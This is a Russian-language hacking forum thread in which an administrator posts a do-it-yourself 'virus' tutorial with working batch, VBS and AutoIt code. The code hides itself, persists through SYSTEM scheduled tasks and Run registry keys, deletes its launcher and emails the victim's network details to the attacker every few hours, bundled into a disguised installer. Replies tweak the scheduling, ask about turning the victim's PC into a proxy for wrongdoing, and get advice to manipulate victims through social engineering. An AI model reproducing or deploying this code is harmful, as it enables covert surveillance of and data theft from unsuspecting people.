Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Вирус для отправки IP адреса на почту,своими руками.

Вирус для отправки IP адреса на почту,своими руками.

Страница: 1

Сообщений 1 страница 17 из 17

1

  • Автор: MOssWar
  • Администратор
  • MOssWar
  • Откуда: Wonderland
  • Зарегистрирован: 2011-07-06
  • Приглашений: 0
  • Сообщений: 1264
  • Уважение: [+32/-2]
  • Пол: Мужской
  • Провел на форуме:
    1 месяц 4 дня
  • Последний визит:
    2014-10-20 00:18:26

В этой статье будет описываться несколько способов как можно сделать вирус который будет отправлять Ip адрес при каждом запуске системы Windows,или через определённое время.
Начнём с простого батинка,создаём текстовый документ (txt),открываем и пишем туда следующие:

Код:
@echo off
blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw пароль
ipconfig /all > ip.txt
blat.exe ip.txt -to логин@yandex.ru
del /s /q ip.txt
exit
cls

Вносим свои данные,сохраняем как ips.bat,компилируем в exe при помощи Bat to exe converter (скачать) и создаём ещё один текстовый документ (txt),открываем и пишем в него следующие:

Код:
@echo off
attrib +a +s +r +h %systemroot%\miwich
schtasks /tr %systemroot%\miwich\ips.exe /ru "System" /sc hourly /mo 5 /tn Windk /f
start %systemroot%\miwich\ips.exe
exit
cls

Сохраняем как slide.bat и компилируем в exe
Далее берём компоненты программы Blat,можете скачать с офф сайта http://www.blat.net/ или с нашего сервера (правда в архиве будет один лишний файл от архиватора rar.exe),собираем всё файлы в кучу,а именно:
Компоненты Blat: blat.exe,blat.dll,blat.lib.
Батинки компилированные в exe: ips.exe и slide.exe
И склеиваем в один исполянемый файл,при помощи Smart Install Maker (как это сделать можете прочитать здесь) на выполнение ставим slide.exe,путь выгрузки всех файлов назначаем %WindowsDir%\miwich\
Всё вирус готов,он будет отсылать IP адрес и дургую информацию которую даёт команда ipconfig на почту,каждые 5 часов.
Правда данная команда не всегда показывает истинный IP адрес и за чистую по адресу пришедшему с такого батинка не подконектишься,так что это далеко не айс.
Рассмотрим ещё один способ,тоже через бат только вперемешку с vbs скриптом.
И так открываем блокнот и пишем туда следующий код:

Код:
On Error Resume Next  
strComputer = "." 
Set objWMIService = GetObject("winmgmts:" _ 
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 
Set IPConfigSet = objWMIService.ExecQuery _ 
    ("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE") 
 For Each IPConfig in IPConfigSet 
    If Not IsNull(IPConfig.IPAddress) Then  
        For i=LBound(IPConfig.IPAddress) to UBound(IPConfig.IPAddress) 
        ipaddr = ipaddr + " " + IPConfig.IPAddress(i) 
             
        Next 
    End If 
Next 
Dim Shell 
set Shell = WScript.CreateObject ("WSCript.shell") 
Shell.run("SendMail /smtpserver smtp.yandex.ru /to логин-кому@yandex.ru /from логин от куда@yandex.ru /subject Message subject /body" + ipaddr + "/user логин /password пароль")

Вбиваем свои данные от почтового ящика и сохраняем как sdg.vbs,далее опять открываем блокнот и пишем маленький батинок:

Код:
@echo off
schtasks /tr %systemroot%\miwich\sdg.vbs /ru "System" /sc hourly /mo 5 /tn Windk /f  >nul
attrib +s +h +r %systemroot%\miwich  >nul
start sdg.vbs  >nul
del "%0" >nul 
cls

сохраняем под любым именем и с расширением bat, склеиваем sdg.vbs,(ваш батинок,допустим 1.bat) с sendMail.exe (скачать) при помощи Smart Install Maker,на выполнение ставим 1.bat,путь выгрузки %WindowsDir%\miwich\,все через каждые пять часов,вирус будет отсылать два Ip адреса,один внутренний,второй настоящий.

Расмотрим пример написания скрипта с отсылкой ip адреса на почту,по средствам простого скриптового языка AutoIt.
Собственно в нём нету ни чего сложного,скрипт узнаёт IP адрес,проверяет наличие интернета и если такое есть то отправляет его на почтовый ящик указанный в скрипте(где что указывать я написал),так же добавляет себя в автозагрузку и прячет сам себя.

Код:
#include <File.au3> 
#include <Inet.au3> 
#include <Process.au3>

#NoTrayIcon
;Заполнить 
$sFile = "IP.txt" 
$SmtpServer = "smtp.yandex.ru"              ; адрес SMTP сервера 
$FromName = "IP-(от кого)"                     ;  пишем имя,любое
$FromAddress = "логин@yandex.ru" ; адрес отправителя 
$ToAddress = "логин@yandex.ru"   ; адрес получателя 
$Subject = "внешний IP"                   ; тема письма 
$AttachFiles = $sFile 
$sText=_GetIP()                                              
$CcAddress = ""      
$BccAddress = ""      
$Importance = "Normal"                  ; приоритет отсылки письма,другие варианты: "High", "Normal", "Low" 
$Username = "логин@yandex.ru"                    ; имя отправителя 
$Password = "пароль"                  ; пас отпрвителя 
$IPPort = 587                            ; порт можно 25,ну и так норм отправляет 
$ssl = 0                               
;~ $IPPort=465; GMAIL порт 
$sArgument = '/320' ;задержка перед началом работы в 320 секунд 
FileSetAttrib ( @ScriptName, "+S+H")

If $CmdLine[0] Then 
    $iTimer = StringRegExpReplace($CmdLine[1], '[^0-9]', '') * 1000 
    $iStart = TimerInit() 
    While TimerDiff($iStart) <= $iTimer 
        Sleep(250) 
    WEnd 
EndIf 
Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Importance="Normal", $s_Username = "", $s_Password = "", $IPPort = 25, $ssl = 0) 
    Local $objEmail = ObjCreate("CDO.Message") 
    $objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>' 
    $objEmail.To = $s_ToAddress 
    Local $i_Error = 0 
    Local $i_Error_desciption = "" 
    If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress 
    If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress 
    $objEmail.Subject = $s_Subject 
    If StringInStr($as_Body, "<") And StringInStr($as_Body, ">") Then 
        $objEmail.HTMLBody = $as_Body 
    Else 
        $objEmail.Textbody = $as_Body & @CRLF 
    EndIf 
    If $s_AttachFiles <> "" Then 
        Local $S_Files2Attach = StringSplit($s_AttachFiles, ";") 
        For $x = 1 To $S_Files2Attach[0] 
            $S_Files2Attach[$x] = _PathFull($S_Files2Attach[$x]) 
;~          ConsoleWrite('@@ Debug : $S_Files2Attach[$x] = ' & $S_Files2Attach[$x] & @LF & '>Error code: ' & @error & @LF) ;### Debug Console 
            If FileExists($S_Files2Attach[$x]) Then 
                ConsoleWrite('+> File attachment added: ' & $S_Files2Attach[$x] & @LF) 
                $objEmail.AddAttachment($S_Files2Attach[$x]) 
            Else 
                ConsoleWrite('!> File not found to attach: ' & $S_Files2Attach[$x] & @LF) 
                SetError(1) 
                Return 0 
            EndIf 
        Next 
    EndIf 
    $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 
    $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer 
    If Number($IPPort) = 0 then $IPPort = 25 
    $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort 
    ;Authenticated SMTP 
    If $s_Username <> "" Then 
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username 
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password 
    EndIf 
    If $ssl Then 
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True 
    EndIf 
    ;Update settings 
    $objEmail.Configuration.Fields.Update 
    ; Set Email Importance 
    Switch $s_Importance 
        Case "High" 
            $objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "High" 
        Case "Normal" 
            $objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "Normal" 
        Case "Low" 
            $objEmail.Fields.Item ("urn:schemas:mailheader:Importance") = "Low" 
    EndSwitch 
    $objEmail.Fields.Update 
    ; Sent the Message 
    $objEmail.Send 
    If @error Then 
        SetError(2) 
        Return $oMyRet[1] 
    EndIf 
    $objEmail="" 
EndFunc  
_RegRun($sArgument)
$i =0 
While $i <= 1                              
$var = Ping("www.google.com",250)       
If @error = 0 Then 
$AttachFiles = @ScriptDir & "\IP.txt" 
_RunDOS("ipconfig /all >>IP.txt")
_FileWriteLog($AttachFiles, $sText) 

Sleep(1000) 
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl) 
sleep(1000) 
FileDelete("IP.txt") 
Sleep(1000*60*60)                ; вот здесь ставим время в миллисекундах отправки IP и скрина ( в данном скрипте каждую 60 минут,то есть последние цифры отвечают за минуты. ) 
EndIf 
WEnd 
Func _RegRun($s_Argument) 
    Local $sRegRun = 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 
    If Not RegRead($sRegRun, @ScriptName) Or RegRead($sRegRun, @ScriptName) <> @ScriptFullPath & ' ' & $s_Argument Then 
        RegWrite($sRegRun, @ScriptName, 'REG_SZ', @ScriptFullPath & ' ' & $s_Argument) 
    EndIf 
EndFunc   
exit

Этот скрипт компилируется в EXE при помощи компилятора AutoIt,в принципе разберётесь,там ни чего сложного нету.
Компилятор можно скачать на офф сайте http://www.autoitscript.com/,существует ещё уйма способов написание подобных как бы вирусов,ну я думаю мы пока что остановимся на этом.
Спасибо за внимание,всего доброго!

+1

2

  • Автор: Натали
  • Пользователь
  • Натали
  • Зарегистрирован: 2011-07-23
  • Приглашений: 0
  • Сообщений: 33
  • Уважение: [+2/-0]
  • Провел на форуме:
    1 день 4 часа
  • Последний визит:
    2014-06-06 07:07:22

Затейник а на семёрке как?работает?

0

3

  • Автор: MOssWar
  • Администратор
  • MOssWar
  • Откуда: Wonderland
  • Зарегистрирован: 2011-07-06
  • Приглашений: 0
  • Сообщений: 1264
  • Уважение: [+32/-2]
  • Пол: Мужской
  • Провел на форуме:
    1 месяц 4 дня
  • Последний визит:
    2014-10-20 00:18:26

Натали всё писалось и тестировалось на 7,правда на вирте(перезагружаться в падлу))

0

4

  • Автор: Almaz88
  • Пользователь
  • Almaz88
  • Зарегистрирован: 2011-08-16
  • Приглашений: 0
  • Сообщений: 14
  • Уважение: [+0/-0]
  • Провел на форуме:
    13 часов 16 минут
  • Последний визит:
    2011-12-14 22:45:58

можно ли как то подключиться через жертву и использовоть его как прокси сервер?

0

5

  • Автор: MOssWar
  • Администратор
  • MOssWar
  • Откуда: Wonderland
  • Зарегистрирован: 2011-07-06
  • Приглашений: 0
  • Сообщений: 1264
  • Уважение: [+32/-2]
  • Пол: Мужской
  • Провел на форуме:
    1 месяц 4 дня
  • Последний визит:
    2014-10-20 00:18:26

Almaz88 на хрена?)
В принципе это реализуемый бред,но зачем оно тебе нужно?
Вообщем можно сделать жертву дедом и свободно серфить по инету точно так же как и через дед,но только до тех пор пока не просекёт тебя твоя жертва,или же тупа не выключит комп.
А вот как сделать с жертвы дедик,эт уже наверное другой вопрос.

0

6

  • Автор: Almaz88
  • Пользователь
  • Almaz88
  • Зарегистрирован: 2011-08-16
  • Приглашений: 0
  • Сообщений: 14
  • Уважение: [+0/-0]
  • Провел на форуме:
    13 часов 16 минут
  • Последний визит:
    2011-12-14 22:45:58

просто хочу что сделать через его ип не очень хорошее я меня потом смогут вычислить?

0

7

  • Автор: MOssWar
  • Администратор
  • MOssWar
  • Откуда: Wonderland
  • Зарегистрирован: 2011-07-06
  • Приглашений: 0
  • Сообщений: 1264
  • Уважение: [+32/-2]
  • Пол: Мужской
  • Провел на форуме:
    1 месяц 4 дня
  • Последний визит:
    2014-10-20 00:18:26

Almaz88  та вычислить та любого смогут как делать не фиг,ток кому ты на нужен?))
Да и сделать ни чего такого существенного ты не сможешь,а соответственно и искать тебя ни кто не будет,так и навредить ты ему таким макаром не смогёшь)
Вообщем брось эту затею,хочешь насолить,толкай жертву самого на искомые поступки и тебе не придётся ни чего делать,только поддакивать))
Используй СИ и всё будет путём без каких либо напряг,жертва сама всё сделает,только нужно правильно сказать.
Заведи знакомства,тип вообще совершенно другой чел и толкай с ним речь,правда времени может уйти уйма,ну если всё делать по уму то результат всегда превосходит все ожидания!))

0

8

  • Автор: naxal
  • Пользователь
  • naxal
  • Зарегистрирован: 2011-11-17
  • Приглашений: 0
  • Сообщений: 14
  • Уважение: [+0/-0]
  • Провел на форуме:
    13 часов 18 минут
  • Последний визит:
    2012-01-12 17:24:48

@echo off
schtasks /tr %systemroot%\miwich\sdg.vbs /ru "System" /sc hourly /mo 5 /tn Windk /f  >nul
attrib +s +h +r %systemroot%\miwich  >nul
start sdg.vbs  >nul
del "%0" >nul
cls
А что здесь изменить чтобы отправка ip выполнялась в определённое время (например всегда в  22:00) ?

0

9

  • Автор: Lyubitel
  • Администратор
  • Lyubitel
  • Откуда: ПЕНТАГОН
  • Зарегистрирован: 2011-07-12
  • Приглашений: 2
  • Сообщений: 821
  • Уважение: [+15/-0]
  • Пол: Мужской
  • Провел на форуме:
    21 день 9 часов
  • Последний визит:
    2014-07-08 23:59:21

naxal

@echo off
schtasks /tr %systemroot%\miwich\sdg.vbs /ru "System" /st 22:00:00  /tn Windk /f  >nul
attrib +s +h +r %systemroot%\miwich  >nul
start sdg.vbs  >nul
del "%0" >nul
cls

типа вот так

0

10

  • Автор: naxal
  • Пользователь
  • naxal
  • Зарегистрирован: 2011-11-17
  • Приглашений: 0
  • Сообщений: 14
  • Уважение: [+0/-0]
  • Провел на форуме:
    13 часов 18 минут
  • Последний визит:
    2012-01-12 17:24:48

Пасибо

0

11

  • Автор: naxal
  • Пользователь
  • naxal
  • Зарегистрирован: 2011-11-17
  • Приглашений: 0
  • Сообщений: 14
  • Уважение: [+0/-0]
  • Провел на форуме:
    13 часов 18 минут
  • Последний визит:
    2012-01-12 17:24:48

"...все через каждые пять часов,вирус будет отсылать два Ip адреса,один внутренний,второй настоящий."
Отправляет 1-й ip нормальный,а 2-й непонятный (::5f8:d8d3:f954:5d90  что-то типа такого)
Как решить ситуацию ?

0

12

  • Автор: hd4870
  • Newsman
  • hd4870
  • Зарегистрирован: 2011-08-27
  • Приглашений: 0
  • Сообщений: 106
  • Уважение: [+5/-1]
  • Провел на форуме:
    3 дня 12 часов
  • Последний визит:
    2014-06-18 19:03:21

naxal Собери вариант на AutoIt.

0

13

  • Автор: MOssWar
  • Администратор
  • MOssWar
  • Откуда: Wonderland
  • Зарегистрирован: 2011-07-06
  • Приглашений: 0
  • Сообщений: 1264
  • Уважение: [+32/-2]
  • Пол: Мужской
  • Провел на форуме:
    1 месяц 4 дня
  • Последний визит:
    2014-10-20 00:18:26

naxal это тот же ip только в неправильной кодировке,пробуй втсавить его как ип,как адрес он должен прокатить,если он является рабочим адресом.

0

14

  • Автор: Евгенатор
  • Пришедший
  • Зарегистрирован: 2012-01-11
  • Приглашений: 0
  • Сообщений: 2
  • Уважение: [+0/-0]
  • Провел на форуме:
    21 минуту
  • Последний визит:
    2012-01-13 14:05:28

@echo off
schtasks /tr %systemroot%\miwich\sdg.vbs /ru "System" /sc hourly /mo 5 /tn Windk /f  >nul
attrib +s +h +r %systemroot%\miwich  >nul
start sdg.vbs  >nul
del "%0" >nul
cls

А что здесь изменить чтобы отправка ip выполнялась через N-ое количество минут?

0

15

  • Автор: Lyubitel
  • Администратор
  • Lyubitel
  • Откуда: ПЕНТАГОН
  • Зарегистрирован: 2011-07-12
  • Приглашений: 2
  • Сообщений: 821
  • Уважение: [+15/-0]
  • Пол: Мужской
  • Провел на форуме:
    21 день 9 часов
  • Последний визит:
    2014-07-08 23:59:21

Евгенатор
@echo off
schtasks /tr %systemroot%\miwich\sdg.vbs /ru "System" /sc hourly /mo 5 /tn Windk /f  >nul
attrib +s +h +r %systemroot%\miwich  >nul
start sdg.vbs  >nul
del "%0" >nul
cls

впиши любое время

0

16

  • Автор: Евгенатор
  • Пришедший
  • Зарегистрирован: 2012-01-11
  • Приглашений: 0
  • Сообщений: 2
  • Уважение: [+0/-0]
  • Провел на форуме:
    21 минуту
  • Последний визит:
    2012-01-13 14:05:28

спасибо ;)

0

17

  • Автор: MOssWar
  • Администратор
  • MOssWar
  • Откуда: Wonderland
  • Зарегистрирован: 2011-07-06
  • Приглашений: 0
  • Сообщений: 1264
  • Уважение: [+32/-2]
  • Пол: Мужской
  • Провел на форуме:
    1 месяц 4 дня
  • Последний визит:
    2014-10-20 00:18:26

правило schtascks пашет только в 7,в хрюшке оно не работает,так что этот пример пракатит только в 7,в качестве универсального способа можно использовать ping.
например :

Код:
@echo off
attrib +s +h +r %systemroot%\miwich  >nul
:restart
start sdg.vbs  >nul
ping -n (кол времени,вроде в секундах) yandex.ru >nul
cls
goto restart >nul

0

Страница: 1

Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Вирус для отправки IP адреса на почту,своими руками.